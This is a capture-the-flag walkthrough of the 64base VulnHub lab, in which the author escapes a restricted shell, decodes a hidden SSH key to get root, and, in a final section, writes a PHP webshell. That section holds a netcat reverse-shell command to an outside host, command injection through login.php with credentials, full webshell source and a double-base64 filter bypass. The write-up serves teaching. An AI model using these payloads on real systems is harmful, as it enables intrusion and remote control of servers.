         ___/O   O\____
        / O        O   \
        \______________/
   -===|____\///\\\/_____
       \----------------/
        \______________/  \/
         /\__________/    //
  >=o\  // //\\   || \\  //
     \\o/ //  \o  ||  \o//
         //    || ||
     /o==o     |o \o==o   LS
    //         //     \\
    /\        //       /\   Arakyd Viper Probe Droid
              /\                 - Front View -

64base@64base:~$

Let's try to see what we are able to do.

64base@64base:~$ cd /
-rbash: cd: restricted


Not cd /

64base@64base:~$ ls -al /
well_done_:D

Not ls -al /

Let's try the obvious then. (cat, less, grep and find all printed droid art, so those are clearly not the real commands; base64, on the other hand, is the theme of the whole challenge.)

64base@64base:~$ base64 well_done_\:D|base64 -d
sshhh! ssh! droids!























































So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

It’s the radmin port clue we grabbed at the start.

Interesting.

Let’s look at our environment

64base@64base:~$ env
TERM=xterm-256color
SHELL=/bin/rbash
SSH_CLIENT=172.16.0.3 60442 62964
SSH_TTY=/dev/pts/0
USER=64base
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/64base
PATH=/var/alt-bin
PWD=/64base
LANG=en_GB.UTF-8
GCC_COLORS=error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01
SHLVL=1
HOME=/64base
LANGUAGE=en_GB:en
LOGNAME=64base
SSH_CONNECTION=172.16.0.3 60442 172.16.0.19 62964
_=/var/alt-bin/env

A custom PATH!

We can list out all the files in that path with the built-in echo command. This works even in rbash because echo is a shell builtin and the * glob is expanded by the shell itself, so no external ls is needed; it only works as a one-liner because PATH holds a single directory (with several entries you would loop over them with a for loop and the same glob).

64base@64base:~$ echo $PATH/*
/var/alt-bin/awk /var/alt-bin/base64 /var/alt-bin/cat /var/alt-bin/dircolors /var/alt-bin/droids /var/alt-bin/egrep /var/alt-bin/env /var/alt-bin/fgrep /var/alt-bin/file /var/alt-bin/find /var/alt-bin/grep /var/alt-bin/head /var/alt-bin/less /var/alt-bin/ls /var/alt-bin/more /var/alt-bin/perl /var/alt-bin/python /var/alt-bin/ruby /var/alt-bin/tail

Awesome, now we can see all the executables we have access to. (Given what we saw above, cat, less, grep, find, perl, python and ruby here are the droid-art wrappers; base64 and env behaved like the real thing.)

OH, what is /var/alt-bin/droids ?

And, when we run it.

64base@64base:~$ droids

[Screenshot omitted: the droids output]

ARGHH, our circuits are being jammed! But luckily we can escape it with CTRL+C

So..

You found a way in then...

but, can you pop root?



                                           /~\
                                          |oo )    Did you hear that?
                                          _\=/_
                          ___            /  _  \
                         / ()\          //|/.\|\\
                       _|_____|_        \\ \_/  ||
                      | | === | |        \|\ /| ||
                      |_|  O  |_|        # _ _/ #
                       ||  O  ||          | | |
                       ||__*__||          | | |
                      |~ \___/ ~|         []|[]
                      /=\ /=\ /=\         | | |
      ________________[_]_[_]_[_]________/_]_[_\_________________________

64base@64base:~$

Urghhh? What just happened then? Well, if we check our path now and also try to traverse directories and execute commands that were restricted before, we can see we've broken out of the jail shell. (A child process cannot alter its parent's PATH, and rbash makes PATH read-only, so droids cannot simply have been an ordinary binary run from the jail; whatever it did, the restriction is gone.)

64base@64base:~$ echo $PATH
/var/alt-bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
64base@64base:~$ /bin/ls -al
total 20
drwxr-xr-x  2 root root 4096 Dec  6 03:32 .
drwxr-xr-x 22 root root 4096 Dec  6 03:00 ..
-rw-r--r--  1 root root 3602 Dec  6 04:39 .bashrc
-rw-r--r--  1 root root  176 Dec  7 17:18 .profile
---S---r-x  1 root root  819 Dec  6 05:05 well_done_:D
[email protected]:~$ /bin/ls -al /
total 84
drwxr-xr-x 22 root root  4096 Dec  6 03:00 .
drwxr-xr-x 22 root root  4096 Dec  6 03:00 ..
drwxr-xr-x  2 root root  4096 Dec  6 03:32 64base
drwxrwxr-x  2 root root  4096 Dec  6 05:23 bin
drwxr-xr-x  3 root root  4096 Nov 28 15:47 boot
drwxr-xr-x 16 root root  2920 Dec 17 18:50 dev
drwxr-xr-x 88 root root  4096 Dec 17 20:42 etc
drwxr-xr-x  3 root root  4096 Nov 28 15:47 home
lrwxrwxrwx  1 root root    29 Nov 28 15:39 initrd.img -> /boot/initrd.img-3.16.0-4-586
drwxr-xr-x 14 root root  4096 Nov 28 16:42 lib
drwx------  2 root root 16384 Nov 28 15:38 lost+found
drwxr-xr-x  3 root root  4096 Nov 28 15:38 media
drwxr-xr-x  2 root root  4096 Nov 28 15:38 mnt
drwxr-xr-x  3 root root  4096 Nov 29 03:13 opt
dr-xr-xr-x 75 root root     0 Dec 17 18:50 proc
drwx------  3 root root  4096 Dec  7 17:16 root
drwxr-xr-x 16 root root   580 Dec 17 18:50 run
drwxr-xr-x  2 root root  4096 Nov 28 15:47 sbin
drwxr-xr-x  2 root root  4096 Nov 28 15:38 srv
dr-xr-xr-x 12 root root     0 Dec 17 18:50 sys
drwxrwxrwt  7 root root  4096 Dec 17 20:42 tmp
drwxr-xr-x 10 root root  4096 Nov 28 15:38 usr
drwxr-xr-x 13 root root  4096 Nov 30 00:19 var
lrwxrwxrwx  1 root root    25 Nov 28 15:39 vmlinuz -> boot/vmlinuz-3.16.0-4-586
[email protected]:~$ cd /
[email protected]:/$ pwd
/


And now we can easily use the find command to discover flag5, which decodes to a hint that leads us on to investigate the file itself.

[email protected]:/$ find / -name flag5*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}
[email protected]:/$ echo TG9vayBJbnNpZGUhIDpECg==|base64 -d
Look Inside! :D

[email protected]:/$ file /var/www/html/admin/S3cR37/flag5*
/var/www/html/admin/S3cR37/flag5{TG9vayBJbnNpZGUhIDpECg==}: JPEG image data, \
JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, \
comment: "4c5330744c5331435255644a546942535530456755464a4a566b4655525342", \
baseline, precision 8, 960x720, frames 3

Some more hex data then? But is that all of it?

[email protected]:/$ strings /var/www/html/admin/S3cR37/flag5*|/usr/bin/head
JFIF
4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c\
517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a62\
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~
4c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b74\
4c5330744c516f3d0a
$Wbr
%4568CDgt
&9ESTVcsu
'7FGdf
(Uev
#3Rbr
mX$S(
-E=m
[email protected]:/$

That’s a big chunk of data.

[email protected]:/$ echo \
> 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c\
> 517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a62\
   
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~
   
> 575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d5642\
> 4c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b74\
> 4c5330744c516f3d0a|xxd -p -r|base64 -d
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,621A38AAD4E9FAA3657CA3888D9B356C
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~
-----END RSA PRIVATE KEY-----
[email protected]:/$

Nice! A private RSA key :D Let’s save it to /tmp, set the correct permissions (ssh refuses a key file that is group- or world-readable), and see if it works for ssh access to root!

[email protected]:/$ echo \
> 4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c\
> 517051636d396a4c565235634755364944517352553544556c6c5156455645436b52460a5379314a62\
   
   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~
   
> 575956493462584a514e315a300a536d39794f57706c53444a305255777764473946635664434d5642\
> 4c4d48565955416f744c5330744c55564f524342535530456755464a4a566b46555253424c52566b74\
> 4c5330744c516f3d0a|xxd -p -r|base64 -d > /tmp/rsa-key
[email protected]:/$ chmod 600 /tmp/rsa-key 
[email protected]:/$ ssh [email protected] -p 62964 -i /tmp/rsa-key 
Could not create directory '/64base/.ssh'.
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
Enter passphrase for key '/tmp/rsa-key': 

Password protected, of course!

But wait, flag5 was a JPEG file! Using scp to copy it off, we can open it with an image viewer.

[email protected]:~# scp -P 62964 [email protected]:/var/www/html/admin/S3cR37/flag5* \
> flag5.jpeg
flag5{TG9vayBJbnNpZGUhIDpECg==}                    100%  192KB  67.8MB/s   00:00

[image: Imperial-Class]

USE THE FORCE, it says.

Retrying SSH using usetheforce as the passphrase for the private key gives us root, and at last we have flag6.

[email protected]:/$ 
[email protected]:/$ ssh [email protected] -p 62964 -i /tmp/rsa-key 
Could not create directory '/64base/.ssh'.
The authenticity of host '[127.0.0.1]:62964 ([127.0.0.1]:62964)' can't be established.
ECDSA key fingerprint is 97:94:13:38:92:70:6c:3a:c0:4f:f3:f3:e7:ce:40:91.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/64base/.ssh/known_hosts).
Enter passphrase for key '/tmp/rsa-key': 

Last login: Wed Dec  7 16:27:53 2016 from localhost

flag6{NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2\
OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNj\
g0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0\
NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YT\
RlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK}
[email protected]:~# 

And we decode the flag one last time…

[email protected]:~# echo \
> NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2\
> OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNj\
> g0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0\
> NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YT\
> RlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK\
> |base64 -d|xxd -p -r|base64 -d|xxd -p -r|base64 -d
base64 -d /var/local/.luke|less.real
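The two decode chains above (hex then base64 for the key hidden in flag5's JPEG comment; base64, hex, base64, hex, base64 for flag6) are instances of one routine: look at the alphabet, peel a layer, repeat. The following is an added example written for this walkthrough, not part of the original challenge; it generalises those two chains to any depth, and the samples it decodes are constructed here rather than the real flag data.

```python
import base64
import binascii
import re
import string

# Alphabets of the two encodings the challenge stacks on top of each other.
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def _clean(blob: str) -> str:
    """Drop whitespace and the trailing backslashes that terminal wrapping adds."""
    return re.sub(r"[\s\\]", "", blob)


def _is_text(data: bytes) -> bool:
    """True when the decoded bytes are printable ASCII (a flag, a PEM key)."""
    try:
        return all(ch in string.printable for ch in data.decode("ascii"))
    except UnicodeDecodeError:
        return False


def peel_layer(blob: str):
    """Decode exactly one layer; returns (kind, bytes), or None if none fits."""
    s = _clean(blob)
    # Hex is the stricter alphabet, and every hex string is also valid base64
    # text, so hex must be tried first or hex layers would be mis-decoded.
    if s and HEX_RE.match(s) and len(s) % 2 == 0:
        return "hex", bytes.fromhex(s)
    if s and B64_RE.match(s) and len(s) % 4 == 0:
        try:
            return "base64", base64.b64decode(s, validate=True)
        except binascii.Error:
            return None
    return None


def unwrap(blob: str, max_layers: int = 10):
    """Peel layers until plain text (str) or binary data (bytes) remains.

    Returns (layers, payload); layers lists the kinds removed, outermost
    first, e.g. ['base64', 'hex', 'base64', 'hex', 'base64'] for flag6.
    """
    layers, current = [], blob
    for _ in range(max_layers):
        step = peel_layer(current)
        if step is None:
            break
        kind, data = step
        layers.append(kind)
        if not _is_text(data):
            return layers, data  # binary (e.g. a JPEG or DER key): stop here
        current = data.decode("ascii")
    return layers, current


def wrap(text: str, layers) -> str:
    """Inverse of unwrap, used only to build the constructed samples below.
    Layers apply innermost first; base64 is wrapped at 76 columns like the
    GNU base64 tool's default, so unwrap must cope with embedded newlines."""
    data = text.encode()
    for kind in layers:
        data = binascii.hexlify(data) if kind == "hex" else base64.encodebytes(data)
    return data.decode()


# Constructed stand-in for flag6's five-layer chain (not the real flag data).
SAMPLE_FLAG6 = wrap("base64 -d /var/local/.luke|less.real\n",
                    ["base64", "hex", "base64", "hex", "base64"])
# Constructed stand-in for the hex-of-base64 key in flag5's JPEG comment.
SAMPLE_KEY = wrap("-----BEGIN RSA PRIVATE KEY-----\n(constructed body)\n"
                  "-----END RSA PRIVATE KEY-----\n", ["base64", "hex"])

if __name__ == "__main__":
    for sample in (SAMPLE_FLAG6, SAMPLE_KEY):
        print(unwrap(sample))
```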

And, we have found the plans and completed the challenge!

        __          __  _ _   _____                      
         \ \        / / | | | |  __ \                     
          \ \  /\  / /__| | | | |  | | ___  _ __   ___    
           \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \   
            \  /\  /  __/ | | | |__| | (_) | | | |  __/   
         __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _ 
         \ \   / /          |  __ \(_)   | | |_   _| | | |
          \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
           \   / _ \| | | | | |  | | |/ _` |   | | | __| |
            | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
            |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
    
_____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
%=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
LS
                 .-. .-.
               .=========.         E x t e r i o r ,   A e r i a l   V i e w
               ||.-.7.-.||         -----------------------------------------
               ||`-' `-'||
               `========='
                `-'| |`-'8               1 .............. Sensor Suite Tower
          ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
         /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
        /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
       /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
       \____\\`==========='//____/       6 .................... Guard towers
       /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
    __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
   /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
  /  \ \  //`-._//|   |\\_.2'\\  / /  \
 /  _.-==='_____//.-=-.\\_____`===-._  \
 \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
  \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
   \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
      \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
       \_____\=============/_____/       tresses have  walls up to 10 meters
       /____///    ___    \\\____\       thick  to  guard   against   ground
       \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
        \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
         \_____|  | 5 | 6|_____/         space attacks.
               `--'   `--'
____________________________________________________________________________
%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%=x%
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   ~~~ EXCESSIVE LINES OF CODE OMITTED HERE ~~~

____________________________________________________________________________

  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
  _   _   ____ __          __ __     __ ____   _    _  _  _____   ______  
 | \ | | / __ \\ \        / / \ \   / // __ \ | |  | |( )|  __ \ |  ____| 
 |  \| || |  | |\ \  /\  / /   \ \_/ /| |  | || |  | ||/ | |__) || |__    
 | . ` || |  | | \ \/  \/ /     \   / | |  | || |  | |   |  _  / |  __|   
 | |\  || |__| |  \  /\  /       | |  | |__| || |__| |   | | \ \ | |____  
 |_| \_| \____/    \/  \/        |_|   \____/  \____/    |_|  \_\|______| 
                                _  ______  _____  _____  _                
             /\                | ||  ____||  __ \|_   _|| |               
            /  \               | || |__   | |  | | | |  | |               
           / /\ \          _   | ||  __|  | |  | | | |  | |               
          / ____ \        | |__| || |____ | |__| |_| |_ |_|               
         /_/    \_\        \____/ |______||_____/|_____|(_)               
  ______  ______  ______  ______  ______  ______  ______  ______  ______  
 |______||______||______||______||______||______||______||______||______| 
                                                                          

                    I hope you enjoyed this challenge
                    Please leave comments & feedback
                    @ https://www.vulnhub.com/?q=64base
                    -----------------------------------
                    64Base Challenge by ȜӎŗgͷͼȜ
                    @ https://ȜӎŗgͷͼȜ.ninja   
                    -----------------------------------

And That’s All Folks* (well almost)

Drop me a comment on here or email me your thoughts.

Thanks,

ȜӎŗgͷͼȜ


** The Following Applies To The Updated Version (Ver_1.0.1) Only **

Writing WebShells

For completeness I have added a description of how it’s also possible to create a secondary webshell and go on to establish a TCP reverse shell as the www-data user.

I decided to allow this in an updated version of the challenge because I suspected I’d maybe made it a little too specific to get a terminal shell on the original version. Plus, I think it’s pretty fun playing with webshells and wanted people to be able to do this just for the joy of it :D.

As some of you will have discovered, the commands available through the login.php script are restricted and only allow things such as ls -al, cat, echo, netstat and whoami, as well as a few others. We can, however, write files to the current directory using a command such as echo testing123 > test.txt.

Let’s use curl again to give that a try.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/login.php?\
> f=system&c=echo%20testing123%20>%20test.txt"|grep -v "</"
Debian GNU/Linux 8 \n \l

Thu Dec 15 06:14:54 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
          inet addr:172.16.0.19  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/test.txt"
testing123


Next, a sensible thing to try is to test whether we can write PHP code to a file with a command such as echo "<?php phpinfo();?>" > phpinfo.txt. This fails, however, because some key special characters are filtered, such as <, ?, /, ', = and ;.

Maybe we can use nc to create a reverse shell.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/login.php?\
> f=system&c=nc%20192.168.0.21%201234%20-e%20/bin/bash"|grep -v "</"
Debian GNU/Linux 8 \n \l

Sat Dec 17 15:51:52 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
          inet addr:172.16.0.19  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

That’s right!

Again, what’s the challenge called? And what tool does it keep relying on?

Let’s use base64 once more to try to bypass the filtering and write a PHP webshell of our own.


Bypass Filtering

Here’s the code of a simple PHP webshell, webshell.php.

<body bgcolor=#000000><font color=#cfbf00>
<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

Then we convert it to a base64 string.

[email protected]:~# base64 webshell.php -w 999
PGJvZHkgYmdjb2xvcj0jMDAwMDAwPjxmb250IGNvbG9yPSNjZmJmMDA+Cjw/cGh\
wCmlmKGlzc2V0KCRfUkVRVUVTVFsnY21kJ10pKXsKICAgICAgICBlY2hvICI8cH\
JlPiI7CiAgICAgICAgJGNtZCA9ICgkX1JFUVVFU1RbJ2NtZCddKTsKICAgICAgI\
CBzeXN0ZW0oJGNtZCk7CiAgICAgICAgZWNobyAiPC9wcmU+IjsKICAgICAgICBk\
aWU7Cn0KPz4K

However, this contains the forbidden / character.

Not to worry. We can just double encode/decode it ;D

[email protected]:~# base64 webshell.php -w 99|base64 -w 999
UEdKdlpIa2dZbWRqYjJ4dmNqMGpNREF3TURBd1BqeG1iMjUwSUdOdmJHOXlQU05\
qWm1KbU1EQStDancvY0dod0NtbG1LR2x6YzJWMEtDUmZVa1ZSVlVWVFZGc25ZMj\
FrSjEwCnBLWHNLSUNBZ0lDQWdJQ0JsWTJodklDSThjSEpsUGlJN0NpQWdJQ0FnS\
UNBZ0pHTnRaQ0E5SUNna1gxSkZVVlZGVTFSYkoyTnRaQ2RkS1RzS0lDQWdJQ0Fn\
SUNCemVYTjBaVwowb0pHTnRaQ2s3Q2lBZ0lDQWdJQ0FnWldOb2J5QWlQQzl3Y21\
VK0lqc0tJQ0FnSUNBZ0lDQmthV1U3Q24wS1B6NEsK

Now we can create a curl command to write this to a PHP file in our current directory and test it out.

[email protected]:~# curl -u '64base:[email protected]@reL00K1ing4' \
> -s "http://172.16.0.19/Imperial-Class/BountyHunter/login.php?\
> f=system&c=echo%20UEdKdlpIa2dZbWRqYjJ4dmNqMGpNREF3TURBd1BqeG1\
> iMjUwSUdOdmJHOXlQU05qWm1KbU1EQStDancvY0dod0NtbG1LR2x6YzJWMEtD\
> UmZVa1ZSVlVWVFZGc25ZMjFrSjEwCnBLWHNLSUNBZ0lDQWdJQ0JsWTJodklDS\
> ThjSEpsUGlJN0NpQWdJQ0FnSUNBZ0pHTnRaQ0E5SUNna1gxSkZVVlZGVTFSYk\
> oyTnRaQ2RkS1RzS0lDQWdJQ0FnSUNCemVYTjBaVwowb0pHTnRaQ2s3Q2lBZ0l\
> DQWdJQ0FnWldOb2J5QWlQQzl3Y21VK0lqc0tJQ0FnSUNBZ0lDQmthV1U3Q24w\
> S1B6NEsK|base64%20-d|base64%20-d%20%3E%20webshell.php"
<body bgcolor=#000000><font color=#cfbf00> <h2>[64base Command Shell]</h2> <pre>
<h4>flag4{NjRiYXNlOjY0YmFzZTVoMzc3Cg==}</h4>
Debian GNU/Linux 8 \n \l

Sat Dec 17 17:50:35 GMT 2016
Linux 64base 3.16.0-4-586 #1 Debian 3.16.36-1+deb8u2 (2016-10-19) i686 GNU/Linux
          inet addr:172.16.0.19  Bcast:172.16.0.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe68:e7f8/64 Scope:Link

Now we can use webshell.php to execute any system commands we want without our input being filtered.
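As an added illustration (not the VM's own login.php code, whose filter is never shown), here is the character blacklist reconstructed from the list above, beside a hypothetical allowlist check of the kind the double-encoded base64 trick would not get past: the blacklist passes the webshell-writing command because it never looks at pipes or redirects, while a parsed-argv allowlist that runs no shell rejects it.

```python
import shlex

# Characters the walkthrough reports as filtered by login.php's command check.
BLACKLIST = set("<?/'=;")

# Programs the walkthrough lists as those login.php is meant to expose.
ALLOWED_PROGRAMS = {"ls", "cat", "echo", "netstat", "whoami"}

# Characters that only mean something to a shell. The allowlisted command is
# meant to run as an argv list with no shell, so these are simply rejected.
SHELL_META = set("|&;<>$`(){}\\\n")


def blacklist_allows(cmd: str) -> bool:
    """The original style of check: block only if a forbidden character appears."""
    return not (set(cmd) & BLACKLIST)


def allowlist_argv(cmd: str):
    """Hardened check: return argv when cmd is an allowed program with plain
    arguments, else None. Pipes and redirects never reach a shell here, so
    smuggling payload bytes through base64 buys nothing."""
    if set(cmd) & SHELL_META:
        return None
    try:
        argv = shlex.split(cmd)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED_PROGRAMS:
        return None
    return argv


# Constructed commands; the base64 text is a placeholder, not the page's.
PHPINFO_ATTEMPT = 'echo "<?php phpinfo();?>" > phpinfo.txt'
DOUBLE_B64_WRITE = "echo QUJDREVG|base64 -d|base64 -d > webshell.php"


def verdicts(cmd: str) -> dict:
    """What each checker decides for one command."""
    return {"blacklist": blacklist_allows(cmd),
            "allowlist": allowlist_argv(cmd) is not None}


if __name__ == "__main__":
    for cmd in ("ls -al", PHPINFO_ATTEMPT, DOUBLE_B64_WRITE):
        print(cmd, verdicts(cmd))
```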

[image: Imperial-Class]

There is really a multitude of commands we could run now to gain a TCP shell. In this example, though, I’m keeping it pretty simple.

Using the locate command we discover another version of netcat (nc.real).

[image: Imperial-Class]

And, after playing around with it we are able to create a reverse shell as www-data.

